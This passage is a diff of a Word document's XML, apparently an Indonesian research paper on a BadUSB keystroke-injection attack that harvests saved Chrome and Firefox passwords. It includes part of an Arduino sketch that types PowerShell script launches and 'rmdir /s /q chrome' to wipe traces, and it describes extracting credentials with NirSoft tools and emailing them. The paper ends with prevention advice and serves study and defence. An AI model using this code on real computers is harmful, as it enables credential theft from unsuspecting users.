+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(1000);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("powershell ./zipping.ps1");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("powershell ./maintenance.ps1");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("cd C:/");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("rmdir /s /q chrome");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("exit");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  // Ending streampdateDownload.pps1</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.end();</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t>/* Unused endless loop */</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t>void loop() {}</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:anchorlock/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:noProof/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Baris Perintah </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Rubber Ducky</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5982,11 +9183,12 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc43264847"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc43264847"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Menjalankan PowerShell </w:t>
       </w:r>
       <w:r>
@@ -5997,7 +9199,7 @@
         </w:rPr>
         <w:t>Script</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6088,14 +9290,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc43264848"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc43264848"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Menjalankan ChromePass dan PasswordFox</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6219,16 +9421,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> yang tersimpan pada </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">penyimpanan lokal komputer. Google Chrome menyimpan </w:t>
+        <w:t xml:space="preserve"> yang tersimpan pada penyimpanan lokal komputer. Google Chrome menyimpan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6350,8 +9543,8 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc43264849"/>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc43264849"/>
+      <w:bookmarkEnd w:id="13"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -6366,7 +9559,7 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6543,7 +9736,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc43264863"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc43264863"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -6895,8 +10088,8 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc43264864"/>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc43264864"/>
+      <w:bookmarkEnd w:id="17"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -6907,7 +10100,7 @@
         </w:rPr>
         <w:t>Analisis Interupsi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6997,15 +10190,16 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:keepNext/>
         <w:ind w:left="284" w:firstLine="436"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289CCC9E" wp14:editId="006B8B37">
-            <wp:extent cx="5467350" cy="3627680"/>
-            <wp:effectExtent l="19050" t="19050" r="19050" b="11430"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289CCC9E" wp14:editId="6F5BF85F">
+            <wp:extent cx="4600658" cy="3052615"/>
+            <wp:effectExtent l="19050" t="19050" r="9525" b="14605"/>
             <wp:docPr id="10" name="Picture 10"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -7026,7 +10220,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5525902" cy="3666530"/>
+                      <a:ext cx="4708838" cy="3124394"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -7047,6 +10241,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="284"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:i w:val="0"/>
@@ -7096,7 +10291,7 @@
           <w:noProof/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>3</w:t>
+        <w:t>4</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7143,7 +10338,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc43264865"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc43264865"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -7154,7 +10349,7 @@
         </w:rPr>
         <w:t>Analisis Pengambilan Data</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7167,6 +10362,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="_Hlk43340750"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
@@ -7281,7 +10477,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">yang disediakan oleh Nirsoft.net bernama ChromePass.exe dan PasswordFox.exe untuk mengambil </w:t>
+        <w:t xml:space="preserve">yang disediakan oleh Nirsoft.net bernama ChromePass dan PasswordFox untuk mengambil </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7317,25 +10513,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> tersebut. Kedua </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>tools</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bekerja dengan cara mengambil </w:t>
+        <w:t xml:space="preserve"> tersebut. Baik ChromePass mauun PasswordFox bekerja dengan cara mengambil </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7371,26 +10549,27 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> lalu dilakukan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>decryption</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> agar data yang disimpan dapat dibaca oleh penyerang.</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> pada penyimpanan lokal komputer lalu melakukan dekripsi terhadap </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>login data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tadi agar dapat dibaca oleh penyerang.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7409,6 +10588,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Pada pengujian ini dilakukan beberapa skenario dengan parameter yang berbeda sehingga dapat disesuaikan dengan kondisi komputer target yang beragam seperti yang dicantumkan pada Tabel </w:t>
       </w:r>
       <w:r>
@@ -7457,7 +10637,6 @@
           <w:iCs w:val="0"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Tabel </w:t>
       </w:r>
       <w:r>
@@ -8104,6 +11283,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1065"/>
+        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1070" w:type="dxa"/>
@@ -8232,7 +11414,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc43264866"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc43264866"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -8243,7 +11425,7 @@
         </w:rPr>
         <w:t>Rekomendasi Untuk Mencegah Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8394,13 +11576,49 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Memperhatikan komputer agar tidak dihubungkan dengan perangkat USB yang mencurigakan oleh siapapun</w:t>
+      <w:bookmarkStart w:id="22" w:name="_Hlk43342361"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Memperhatikan komputer agar tidak dihubungkan dengan perangkat USB yang mencurigakan </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">karena bentuk BadUSB yang digunakan penyerang seringkali sulit dibedakan dengan USB </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>mass storage</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> biasa.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8418,13 +11636,59 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Mematikan atau mengunci komputer apabila akan ditinggalkan dan tidak terjangkau oleh pemilik</w:t>
+      <w:bookmarkStart w:id="23" w:name="_Hlk43342370"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mematikan atau mengunci komputer saat ditinggalkan </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="23"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">karena pengambilan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> menggunakan USB hanya memakan waktu yang singkat serta tidak meninggalkan jejak sehingga pemilik komputer tidak akan menyadari bahwa telah terjadi penyerangan terhadap perangkatnya.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8448,6 +11712,84 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
+        <w:t xml:space="preserve">Tidak menyimpan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
